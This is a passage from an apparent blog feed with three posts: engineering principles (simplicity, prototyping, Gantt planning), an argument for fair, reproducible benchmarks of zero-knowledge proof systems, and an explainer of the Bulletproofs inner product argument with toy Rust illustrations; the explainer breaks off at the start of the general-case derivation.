&lt;p&gt;Once a problem has been identified, speak openly about it. Of course &lt;em&gt;how&lt;&#x2F;em&gt; one communicates is all important when talking to other humans, but if framed correctly a technical discussion should not offend anyone, as the merits or faults of any technical solution only reflect on the thing itself, and not the value of the human or group implementing it.&lt;&#x2F;p&gt;
&lt;p&gt;The earlier a problem (or solution) is communicated and discussed, the better the final solution will be, the lower the risk and cost.&lt;&#x2F;p&gt;
&lt;p&gt;“Pride is not the opposite of shame, but its source. True humility is the only antidote to shame.”&lt;&#x2F;p&gt;
&lt;h2 id=&quot;relationship-with-complexity-or-lack-thereof&quot;&gt;Relationship with complexity (or lack thereof)&lt;&#x2F;h2&gt;
&lt;p&gt;If there is one mantra we repeat and can apply in any context, it is KISS, Keep It Simple, Silly.&lt;br &#x2F;&gt;
Much has been written about this, and there are echoes of it in many other wise reflections, such as Joe Armstrong’s famous quote &lt;em&gt;“Make it work, then make it beautiful, then if you really, really have to, make it fast. 90% of the time, if you make it beautiful, it will already be fast. So really, just make it beautiful!”&lt;&#x2F;em&gt; ; or in some of the tenets of the Zen of Python:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Beautiful is better than ugly.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Explicit is better than implicit.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Simple is better than complex.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Complex is better than complicated.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Flat is better than nested.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Sparse is better than dense.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Readability counts.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Such general maxims are something that may seem truisms, or tautological sometimes. Their value is in keeping them constantly in mind and asking “how does this apply &lt;em&gt;in this context&lt;&#x2F;em&gt;?”.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;dogfooding&quot;&gt;Dogfooding&lt;&#x2F;h2&gt;
&lt;p&gt;Repositories should build easily and cleanly on all of the target environments. A newcomer to the project should be able to set it up with no hassle. Take pride in having an up-to-date readme that people can follow and have your code working on their machine in no time. Open-source as much as you can. Put your code out into the world.&lt;&#x2F;p&gt;
&lt;p&gt;Developers should be hands-on about infra, not only familiar with the usual tooling for development but also with the pipelines and code which puts it into production. Your pipelines should be clean and as observable and debuggable as the product code.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;generalization-should-be-end-game&quot;&gt;Generalization should be end game&lt;&#x2F;h2&gt;
&lt;p&gt;Do not generalize until you absolutely need it. Repeating code two or three times can be fine. Solve the problem you need to solve, don’t get tangled up in how to abstract or generalize the solution, just get it done in the simplest way possible. Generalizations and abstractions arise naturally with time.&lt;&#x2F;p&gt;
&lt;p&gt;Most new challenging projects usually have two different phases:&lt;&#x2F;p&gt;
&lt;h3 id=&quot;first-few-weeks-experiment-and-prototype&quot;&gt;First few weeks: experiment and prototype&lt;&#x2F;h3&gt;
&lt;p&gt;Things are just starting out. The problem being solved is not yet well understood, there’s a lot of uncertainty; some people know just enough about the problem to recognize it’s a difficult task, but not enough to go ahead and tackle it. This creates a lot of anxiety around how things should be done and what the best way forward is; endless debates that go nowhere ensue. Sometimes some knowledge is worse than knowing nothing at all.&lt;&#x2F;p&gt;
&lt;p&gt;Getting through this requires recognizing that you don’t fully know how to do things and that’s fine; you have to figure it out through trial and error. The mantra here is &lt;em&gt;Go fast, try things out, fail quickly, figure it out&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Introducing a lot of process at this stage is counter-productive; you can’t make a Gantt chart and plan things out with deadlines when you’re not even sure what it is you are building. Doing so just slows you down or sets you on the wrong path.&lt;&#x2F;p&gt;
&lt;p&gt;Morale at this stage is also very important; people are anxious that the project might not pan out, that the problem is not solvable. If there’s too much time without any update or any sort of progress, they get demoralized. The antidote is quickly coding something that performs some basic form of the final desired behavior, and each passing week should expand and improve upon functionality. Don’t let weeks pass by creating lots of code that still doesn’t perform a basic function. Showing regular updates, merging changes quickly and trying them out, deploying regularly and all around having a fast feedback loop is essential to keep people excited and focused.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;settling-down&quot;&gt;Settling down&lt;&#x2F;h3&gt;
&lt;p&gt;After a few weeks of work, the project begins to take shape, the problem is better understood and the solution is working out well. People start developing a common vocabulary around the project, they know what problem needs to be solved next and how to do it. Anxiety wears off.&lt;&#x2F;p&gt;
&lt;p&gt;At this point, two things become important:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Organizing the work that’s yet to come. The project is no more than a prototype right now, and there is a ton of work to be done to make it production ready.&lt;&#x2F;li&gt;
&lt;li&gt;Documenting the progress so far. A lot of knowledge was accumulated in the first few weeks&#x2F;months of work as ideas were tried out and discarded. It’s important for it not to get lost.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Solving these issues (especially the first one) requires introducing &lt;em&gt;process&lt;&#x2F;em&gt;. Writing down all the remaining tasks, making a Gantt chart, defining milestones, and distributing work accordingly are now necessary to continue. The main obstacle is no longer so much uncertainty, but rather correct planning and execution.&lt;&#x2F;p&gt;
&lt;p&gt;As the project continues to take shape and grow, merging new changes becomes more and more difficult; its complexity starts making it impossible for you to know every nook and cranny. Also, breaking things has a higher cost both in development time and perhaps money if you’re in production. Thorough testing and code review thus become key.&lt;&#x2F;p&gt;
&lt;p&gt;Process is the sign of a &lt;em&gt;mature&lt;&#x2F;em&gt; project. It is very important, but it should not be introduced before it’s necessary.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;back-and-forth&quot;&gt;Back and forth&lt;&#x2F;h3&gt;
&lt;p&gt;Most projects go through these phases more than once. In general, any time a project gets a new requirement that involves a challenging task, a part of it has to revert to the experimentation phase.&lt;&#x2F;p&gt;
&lt;p&gt;The key here is &lt;em&gt;uncertainty&lt;&#x2F;em&gt;. When you detect that a given task is hard and people are spending way too much time arguing about how to solve it, without ever trying things out (for fear of breaking things or making the wrong move) you need to revert back to the first phase. This doesn’t mean throwing all the process out the window; people who are working on other regular tasks can continue as usual. It’s just the part of the team tackling this new challenge that needs to change its approach.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;incorporating-process&quot;&gt;Incorporating process&lt;&#x2F;h2&gt;
&lt;p&gt;Of all the infinite process management tools and diagrams under the sun, the one we find most useful is the Gantt chart.&lt;br &#x2F;&gt;
Here is an outline of how we go about making one, once the project requires it.&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Understand what areas there are in the project in a very broad way, e.g. networking, state transitions, api, db, external services, infra. Architecture diagrams might help at this stage.&lt;&#x2F;li&gt;
&lt;li&gt;Divide areas into tasks.&lt;&#x2F;li&gt;
&lt;li&gt;Repeat step 2 a couple of times. This refining will help direct research and prevent the “I want to know everything before coding” mindset.&lt;&#x2F;li&gt;
&lt;li&gt;Research doesn’t mean just reading; this is a good stage to start with some very small PoCs of things you don’t understand. Some PoCs can even be a good task to delegate to other team members while still figuring out tasks. You’ll need to review those in depth later on, though.&lt;&#x2F;li&gt;
&lt;li&gt;Track dependencies between tasks. A dependency graph might be a good output here.&lt;&#x2F;li&gt;
&lt;li&gt;Use the dependencies to prioritize (order), and group tasks in vertical slices. These are E2E integrations that provide some high-level feature and usually include a bit of all areas.&lt;&#x2F;li&gt;
&lt;li&gt;The first vertical slice should be bare bones, maybe providing a dumb, useless feature, but it should give you “something” working. It should have a db, api, networking, ci, testing and linting (and other tools if necessary). This will force you to be in a production mindset from day 1 and avoid giant integrations later on. It also forces you to start doing PoCs of different tools early to reduce uncertainty and unblock as many independent paths as possible for the next slices.&lt;&#x2F;li&gt;
&lt;li&gt;Make a release plan using these slices. Roughly estimate a number of weeks for each; this is not the time for precise estimations. Also, multiply that number by 1.5 or 2 depending on how optimistic you tend to be and how little you still know about the project.&lt;&#x2F;li&gt;
&lt;li&gt;Now you can make a Gantt chart reflecting the release plan and the number of people you have.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;</description>
      </item>
      <item>
          <title>Don&#x27;t trust, verify or why you should care about benchmarks</title>
          <pubDate>Sat, 02 Sep 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/dont-trust-verify-or-why-you-should-you-care-about-benchmarks/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/dont-trust-verify-or-why-you-should-you-care-about-benchmarks/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/dont-trust-verify-or-why-you-should-you-care-about-benchmarks/">&lt;p&gt;Recently, there has been quite a lot of debate between researchers and engineers on the best proof system. For example, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;SuccinctJT&#x2F;status&#x2F;1696877149251055834&quot;&gt;Justin Thaler&lt;&#x2F;a&gt; and Srinath Setty have been discussing whether FRI or KZG based SNARKs are better in computational terms, following some calculations by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;PapiniShahar&#x2F;status&#x2F;1696327688192237999&quot;&gt;Eli Ben-Sasson during SBC&lt;&#x2F;a&gt;. Before jumping into the details and our view on benchmarks, we want to say that we really like all the work developed by the authors, bringing new ideas and debates that can help expand and improve zero-knowledge schemes and their applications. We learned from all of them but think that we should have some clearer criteria on what makes something more performant or useful in engineering terms. Besides, performance and suitability are sometimes application dependent, as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;Zac_Aztec&#x2F;status&#x2F;1696673331116638382&quot;&gt;Zac Williamson&lt;&#x2F;a&gt; pointed out in an exchange on X, indicating that SNARKs could be more advantageous in client side proving.&lt;&#x2F;p&gt;
&lt;p&gt;Nowadays, on the performance side of things, three big strategies are being publicly discussed:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Folding schemes&lt;&#x2F;li&gt;
&lt;li&gt;Lookup singularity&lt;&#x2F;li&gt;
&lt;li&gt;STARKs with small fields&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;With time, some ideas might be combined. In the meantime, we need a way of analyzing their practical potential. We can use back-of-the-envelope calculations to analyze these different strategies and proving systems, but they are just estimations of the total number of operations and, as such, should always be taken with a grain of salt. They may be useful to assess whether some system or algorithm could outperform another, but not as a final measure of performance. Something similar happens with asymptotic complexity: we know of algorithms that may be optimal from the complexity point of view but have no practical applications (the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Galactic_algorithm&quot;&gt;famous galactic algorithms&lt;&#x2F;a&gt;). Besides, in engineering, problems are multidimensional and there is a lot of interaction between different parts.&lt;&#x2F;p&gt;
&lt;p&gt;There are constraints regarding memory, data communication, hardware acceleration, code maintainability, economics, etc. For example, memory access patterns can cause a program with fewer instructions to run slower if it isn’t suited to caching, data prefetching, and other memory optimizations. Complexity increases when we additionally consider the degree of parallelization of the algorithms and GPUs, and even more when we can distribute computation across many machines. An efficient algorithm that can run on only one machine may be worse in some scenarios than a less efficient one that can be distributed across multiple devices. This is, once again, very similar to what Zac has mentioned: there may be different criteria for selecting algorithms depending on the use case. Most of the time in software, multiple solutions to one problem are used depending on the scenario, and even mixed together when required. To think we already have a grand solution for all problems, optimal in all scenarios, may be underestimating the complexities of the applied world. Some claims about the number of operations do not take into account the constraints imposed by hardware, or count operations using special field families that are not applicable to the kind of elliptic curve chosen. For example, commonly used pairing-friendly elliptic curves are defined over primes that don’t have the same type of efficient arithmetic as Mersenne primes or the “MiniGoldilocks” prime.&lt;&#x2F;p&gt;
&lt;p&gt;Another example of the complexity of real engineering systems is, from our point of view, this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;SuccinctJT&#x2F;status&#x2F;1696883492380979257&quot;&gt;tweet by Thaler&lt;&#x2F;a&gt;. He asked why Starkware continues to use a rather large finite field despite it not offering any advantages over smaller ones. The reason is quite simple: the SHARP was developed before many of these improvements and has been in production for many years. Furthermore, for production-ready software we need more than a prover: we need languages, compilers, VMs, tools for developers, and sequencers for blockchains. There is a lot of work involved, and rushing to change the prover with each possible upgrade, on a system that’s in production with a lot of value at stake, may be reckless. From a brilliant idea on paper to a production-ready system there is a lot of engineering work, and we always find many more difficulties along the way that were not originally considered or would have been difficult to foresee.&lt;&#x2F;p&gt;
&lt;p&gt;Critical analysis, with measurements and a good understanding of the possible solutions, is key. We have seen claims such as that STARKs use over 100 GB of RAM for small programs; it’s not clear what the criterion of comparison is, nor how many GB the alternatives would use. It is important to take advantage of open-source software and play with the tools developed by others, to check whether they work as stated and to corroborate the numbers.&lt;&#x2F;p&gt;
&lt;p&gt;We think that Nova and Lasso bring interesting ideas, which can spark new solutions in other proof systems. We wrote a &lt;a href=&quot;&#x2F;incrementally-verifiable-computation-nova&#x2F;&quot;&gt;post on Nova&lt;&#x2F;a&gt; and we plan to have one on Jolt and Lasso. We even had discussions on whether we could adapt some of the ideas behind them to a STARK prover. Folding schemes such as Nova can help solve many problems related to SNARKs based on Plonkish or R1CS arithmetization. In the case of the Cairo prover, there is a strategy that zips the constraints: the Cairo AIR contains the constraints for all the instructions of a Turing-complete virtual machine, and the number of constraints does not change with the computation size, as opposed to the execution trace, which grows linearly with the size of the program. The trace is then interpolated and the constraints are enforced via quotients. So the relevant measure here is the number of steps of the program, not the number of constraints. Fair measurements should be conducted over commonly used computations or transactions, for example an ERC-20 contract. We should also be careful not to see speed in a single task as the only thing that matters: clean codebases that are easy to maintain and update, robustness, security, memory use, and auditability are also factors to take into account.&lt;&#x2F;p&gt;
&lt;p&gt;We like the work done in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;blog.celer.network&#x2F;2023&#x2F;08&#x2F;04&#x2F;the-pantheon-of-zero-knowledge-proof-development-frameworks&#x2F;&quot;&gt;benchmarks by Celer Network&lt;&#x2F;a&gt;, which try to give a fair comparison between different proof systems using SHA-256 as the example circuit. That said, we always have to keep in mind that it can become tempting for a project or a particular team to over-optimize its codebase for a particular benchmark. It’s good to see, however, that the Celer benchmark points out that it is quite difficult to establish a comparison for Nova: “It’s important to recognize that Nova cannot be directly compared with other frameworks in terms of time and computation. This uniqueness stems from the incremental computing capabilities enabled by Nova. To put it simply, breaking down the entire computation into more detailed steps naturally leads to a decrease in memory consumption, even though it may cause an increase in computation time.” We point out that some of the proof systems are not fully optimized, and that could change the trends. The memory vs. speed trade-off may be convenient for some use cases, but not for others.&lt;&#x2F;p&gt;
&lt;p&gt;Another point worth noting is that some people tend to add constraints that in practice do not exist, or to generalize the strategies that one company uses to all other possible implementations. For example, if A uses Poseidon as a hash function, they assume that B, C, and D should also use Poseidon, even though that may not fit their particular application. In a recursive environment, we can prove with a SNARK that we verified a STARK proof, which has a lot of use cases. Of course, if we have a tree of recursive proofs of verifications, there is nothing preventing the use of a faster hash function for the leaves, such as Blake2, and then proving in the second layer, with Poseidon or another hash, that we verified proofs that used Blake2.&lt;&#x2F;p&gt;
&lt;p&gt;We think that we should have clear benchmarks, with code used in production. There are, of course, new technologies and ideas that may be promising and that we should explore, but we should never be too hasty to jump onto the next boat, especially when users’ assets or privacy are at stake. We will be implementing the different proving systems in the Lambdaworks library, so that anyone can run the benchmarks easily and check which one suits them best. Moreover, if there are optimizations for any of the systems, anyone can submit a PR to improve them. We are not maximalists about any proof system; what we want is for this technology to succeed and for applications to be developed on top of it. If a particular system works better, we will learn it and work with it.&lt;&#x2F;p&gt;
&lt;p&gt;We think that debate and different points of view are important to bring new ideas and improvements to the table, from which we can all benefit. Having open-source code, and not only papers, available to tweak, analyze, and play with is crucial for making comparisons between proving systems. Starkware just open-sourced its battle-tested &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&quot;&gt;Stone prover&lt;&#x2F;a&gt;, and this will help a lot with improvements and comparisons between strategies. We also really like initiatives such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.zprize.io&#x2F;&quot;&gt;ZPrize&lt;&#x2F;a&gt;, where teams propose open-source optimizations to common problems in zero-knowledge proofs. This can give us the opportunity to explore different strategies and arrive at algorithms that work best in practice.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Inner Product Argument (IPA) and a Polynomial Commitment Scheme</title>
          <pubDate>Fri, 25 Aug 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/ipa-and-a-polynomial-commitment-scheme/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/ipa-and-a-polynomial-commitment-scheme/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/ipa-and-a-polynomial-commitment-scheme/">&lt;p&gt;In this blogpost, we’ll take a closer look at the Inner Product Argument. We’ll start by understanding the basics of this technique and then shift our focus to its variant within the Halo2 proving system. Specifically, we’ll explore how Halo2 ingeniously employs the Inner Product Argument as a polynomial commitment scheme.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s first fix some notation that will be used throughout the text.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;notation&quot;&gt;Notation&lt;&#x2F;h2&gt;
&lt;p&gt;The symbol $\mathbb{F}$ always denotes a prime field of order $p$. Given two vectors $A=(a_1,\dots,a_n)$ and $B=(b_1,\dots,b_n)$ of elements of $\mathbb{F}$ of the same length, the inner product between $A$ and $B$ is the element $a_1b_1 + \cdots + a_nb_n \in \mathbb{F}$. It is denoted by $\langle A, B\rangle$.&lt;&#x2F;p&gt;
&lt;p&gt;The symbol $\mathbb{G}$ denotes a commutative group of order $p$. We always use additive notation. If $A=(a_1,\dots,a_n)$ is a vector of elements of $\mathbb{F}$ and $G=(G_1, \dots, G_n)$ is a sequence of elements of $\mathbb{G}$, then $\langle A, G\rangle$ denotes the element $a_1G_1 + \cdots + a_nG_n \in\mathbb{G}$.&lt;&#x2F;p&gt;
&lt;h1 id=&quot;the-inner-product-argument&quot;&gt;The inner product argument&lt;&#x2F;h1&gt;
&lt;p&gt;To understand what this is all about, let’s go straight to its description. It is a sort of commitment scheme involving a prover and a verifier. The argument has two parts.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Commit&lt;&#x2F;strong&gt; : The prover can commit to a pair of vectors $(A, B)$, where $A \in \mathbb{F}^n$ and $B \in \mathbb{F}^n$, by producing an object that we denote by $P$. This process does not reveal $A$ or $B$, but it is binding: with high probability, any other pair of vectors would produce a different commitment. Usually, the prover sends $P$ to the verifier.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Open&lt;&#x2F;strong&gt; : Assume the verifier already holds a commitment $P$. The open protocol is an interactive protocol in which the prover sends a value $c\in\mathbb{F}$ and convinces the verifier that&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$P$ is a valid commitment of two vectors $A$ and $B$, both of length $n$.&lt;&#x2F;li&gt;
&lt;li&gt;The value $c$ is the inner product of $A$ and $B$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;ok-but-why&quot;&gt;Ok, but why?&lt;&#x2F;h3&gt;
&lt;p&gt;This scheme by itself might not seem particularly valuable, as $A$ and $B$ can be anything. However, its significance lies in its role as a building block for other proving systems. Within these contexts, additional checks are applied to enforce specific structures upon $A$, $B$, and $c$, all dependent on public parameters. Instead of sending $P$, the prover sends other commitments that make the structure checks on $A$ and $B$ possible; from those commitments, the verifier can efficiently reconstruct $P$. This gives the vectors contextual meaning with respect to the statement being proven, and the requirement that their inner product equals a predetermined value serves as evidence of the prover’s knowledge of that fact.&lt;&#x2F;p&gt;
&lt;p&gt;The version we’ll describe next was introduced in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2017&#x2F;1066&quot;&gt;Bulletproofs paper&lt;&#x2F;a&gt;. To gain further insight into its application within a zero-knowledge proof of arithmetic circuits, refer to Section 5 of that paper.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;setup&quot;&gt;Setup&lt;&#x2F;h3&gt;
&lt;p&gt;Both the Commit and Open protocols depend on a few precomputed values. The needed ingredients are:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;A commutative group $\mathbb{G}$ with $p$ elements. We’ll use additive notation.&lt;&#x2F;li&gt;
&lt;li&gt;Two sequences $G=(G_1,\dots, G_n)$ and $H=(H_1,\dots, H_n)$ of elements of $\mathbb{G}$. We may refer to these as &lt;em&gt;bases&lt;&#x2F;em&gt;.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Here $n$ is the length of the vectors to be committed. We will always assume it is a power of two. If this is not the case, vectors can be padded with zeroes until the next power of two.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;commit&quot;&gt;Commit&lt;&#x2F;h3&gt;
&lt;p&gt;Given vectors $A = (a_1,\dots, a_n)$ and $B=(b_1,\dots, b_n)$, the commitment of the pair $(A, B)$ is:&lt;&#x2F;p&gt;
&lt;p&gt;$$P := \sum_{i=1}^n a_i G_i + \sum_{i=1}^n b_i H_i.$$&lt;&#x2F;p&gt;
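&lt;p&gt;As a sanity check, the commitment formula can be sketched in a few lines of Rust. Note this is a toy model: the additive group of integers modulo a small prime stands in for $\mathbb{G}$ (a real instantiation would use an elliptic-curve group where discrete logarithms are hard), and all concrete values are made up for illustration.&lt;&#x2F;p&gt;

```rust
// Toy sketch of the commitment P = <A, G> + <B, H>.
// CAUTION: Z_p under addition stands in for the group G here; this is
// insecure and only meant to illustrate the bookkeeping.
const PRIME: u64 = 101; // small prime, toy parameter

/// Multiscalar sum a_1 G_1 + ... + a_n G_n, all modulo PRIME.
pub fn msm(scalars: &[u64], bases: &[u64]) -> u64 {
    scalars
        .iter()
        .zip(bases)
        .fold(0, |acc, (a, g)| (acc + a * g) % PRIME)
}

/// Commitment of the pair (A, B) under bases G and H.
pub fn commit(a: &[u64], b: &[u64], g: &[u64], h: &[u64]) -> u64 {
    (msm(a, g) + msm(b, h)) % PRIME
}
```

&lt;p&gt;For example, with $A=(1,2)$, $B=(3,4)$ and toy bases $G=(5,7)$, $H=(11,13)$, the commitment is $(1\cdot 5 + 2\cdot 7 + 3\cdot 11 + 4\cdot 13) \bmod 101 = 3$.&lt;&#x2F;p&gt;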
&lt;h3 id=&quot;open&quot;&gt;Open&lt;&#x2F;h3&gt;
&lt;p&gt;The Open protocol has $\log_2(n)$ rounds. Let’s start with the easiest example.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;case-n-2&quot;&gt;Case $n=2$.&lt;&#x2F;h4&gt;
&lt;p&gt;In this case $A = (a_1, a_2)$ and $B = (b_1, b_2)$.&lt;&#x2F;p&gt;
&lt;p&gt;The protocol starts with the verifier choosing a random element $U$ in $\mathbb{G}$ and sending it to the prover.&lt;&#x2F;p&gt;
&lt;p&gt;The prover computes the following elements and sends them to the verifier&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$L := a_1G_2 + b_2H_1 + a_1b_2U$ and&lt;&#x2F;li&gt;
&lt;li&gt;$R := a_2G_1 + b_1H_2 + a_2b_1U$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The verifier chooses a random non-zero value $x\in\mathbb{F}$ and sends it to the prover, who uses it to compute the following elements:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$a’ := a_1 x + a_2 x^{-1}$&lt;&#x2F;li&gt;
&lt;li&gt;$b’ := b_1 x^{-1} + b_2 x$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The prover sends $a’$ and $b’$ to the verifier. Finally, the verifier checks that:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{equation}&lt;br &#x2F;&gt;
x^2 L + P + c U + x^{-2} R = x^{-1} a’ G_1 + xa’ G_2 + x b’ H_1 + x^{-1} b’ H_2 + a’b’U&lt;br &#x2F;&gt;
\end{equation}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;The verifier accepts if and only if the above equality holds.&lt;&#x2F;p&gt;
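&lt;p&gt;The check above can also be exercised numerically. The following sketch plays one honest round of the $n=2$ case in a toy setting (the additive group modulo a small prime stands in for $\mathbb{G}$; insecure, and all concrete values are made up) and computes both sides of the equation, which should agree.&lt;&#x2F;p&gt;

```rust
// Toy run of the n = 2 check: Z_p under addition stands in for G
// (insecure, for illustration only).
const PRIME: u64 = 101;

fn m(a: u64, b: u64) -> u64 { a * b % PRIME }

/// x^(PRIME-2) mod PRIME: the multiplicative inverse, by Fermat's little theorem.
fn inv(x: u64) -> u64 {
    let (mut base, mut e, mut acc) = (x % PRIME, PRIME - 2, 1);
    while e > 0 {
        if e & 1 == 1 { acc = m(acc, base); }
        base = m(base, base);
        e >>= 1;
    }
    acc
}

/// Runs one honest n = 2 round; returns (lhs, rhs) of the verifier check
///   x^2 L + P + cU + x^{-2} R = x^{-1}a'G_1 + x a'G_2 + x b'H_1 + x^{-1}b'H_2 + a'b'U.
pub fn verifier_check(a: [u64; 2], b: [u64; 2], g: [u64; 2], h: [u64; 2], u: u64, x: u64) -> (u64, u64) {
    let p_comm = (m(a[0], g[0]) + m(a[1], g[1]) + m(b[0], h[0]) + m(b[1], h[1])) % PRIME;
    let c = (m(a[0], b[0]) + m(a[1], b[1])) % PRIME; // inner product <A, B>
    let l = (m(a[0], g[1]) + m(b[1], h[0]) + m(m(a[0], b[1]), u)) % PRIME;
    let r = (m(a[1], g[0]) + m(b[0], h[1]) + m(m(a[1], b[0]), u)) % PRIME;
    let xi = inv(x);
    let a_p = (m(a[0], x) + m(a[1], xi)) % PRIME; // a' = a_1 x + a_2 x^{-1}
    let b_p = (m(b[0], xi) + m(b[1], x)) % PRIME; // b' = b_1 x^{-1} + b_2 x
    let lhs = (m(m(x, x), l) + p_comm + m(c, u) + m(m(xi, xi), r)) % PRIME;
    let rhs = (m(xi, m(a_p, g[0])) + m(x, m(a_p, g[1]))
        + m(x, m(b_p, h[0])) + m(xi, m(b_p, h[1])) + m(m(a_p, b_p), u)) % PRIME;
    (lhs, rhs)
}
```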
&lt;h4 id=&quot;completeness-idea&quot;&gt;Completeness idea&lt;&#x2F;h4&gt;
&lt;p&gt;To see why this equality holds, one can expand both sides and check that they have the same terms. Let’s examine for example the first term on the right-hand side:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
x^{-1} a’ G_1 &amp;amp;= x^{-1} (a_1 x + a_2 x^{-1}) G_1 \\&lt;br &#x2F;&gt;
&amp;amp;= (a_1 + a_2 x^{-2}) G_1 \\&lt;br &#x2F;&gt;
&amp;amp;= \color{blue}{a_1 G_1} + \color{red}{x^{-2} a_2 G_1}&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Notice how this matches part of $P = \color{blue}{a_1G_1} + a_2G_2 + b_1H_1 + b_2H_2$. The other term appears in $x^{-2}R = \color{red}{x^{-2}a_2G_1} + x^{-2} b_1 H_2 + x^{-2}a_2b_1U$. The rest of the terms behave similarly.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;soundness-idea&quot;&gt;Soundness idea&lt;&#x2F;h4&gt;
&lt;p&gt;In the Bulletproofs paper, the authors prove that, under the discrete log assumption, if the prover could successfully respond with $a’,b’$ for at least $4$ different values of $x$, then two vectors $A$ and $B$ can be extracted from them such that $\langle A, B\rangle = c$ and $P$ is the commitment of the pair $(A, B)$.&lt;br &#x2F;&gt;
So if such $A$ and $B$ don’t exist, there are at most $3$ values of $x$ for which the prover knows $a’$ and $b’$ that make the verifier’s check pass. But the chances that the verifier happens to choose one of those $3$ values at random are negligible.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;general-case-for-n-2-k&quot;&gt;General case for $n = 2^k$&lt;&#x2F;h4&gt;
&lt;p&gt;It is an iterative process: in each step, the prover takes two vectors $A$ and $B$ of size $2^k$ and produces two vectors $A’$ and $B’$, each of size $2^{k-1}$. In the subsequent step, $A’$ and $B’$ take the roles of $A$ and $B$, and the process repeats until the vectors have length $2$. In each intermediate step, the bases $G$ and $H$ are also updated to halve their length.&lt;br &#x2F;&gt;
In the first iteration, $A$ and $B$ are the original vectors, and the final step is exactly the base case already described for $n=2$. At the end, $A’$ and $B’$ have length $1$, so they are just elements of $\mathbb{F}$. They are the elements we denoted by $a’$ and $b’$ above.&lt;&#x2F;p&gt;
&lt;p&gt;Concretely, the first step is as follows.&lt;&#x2F;p&gt;
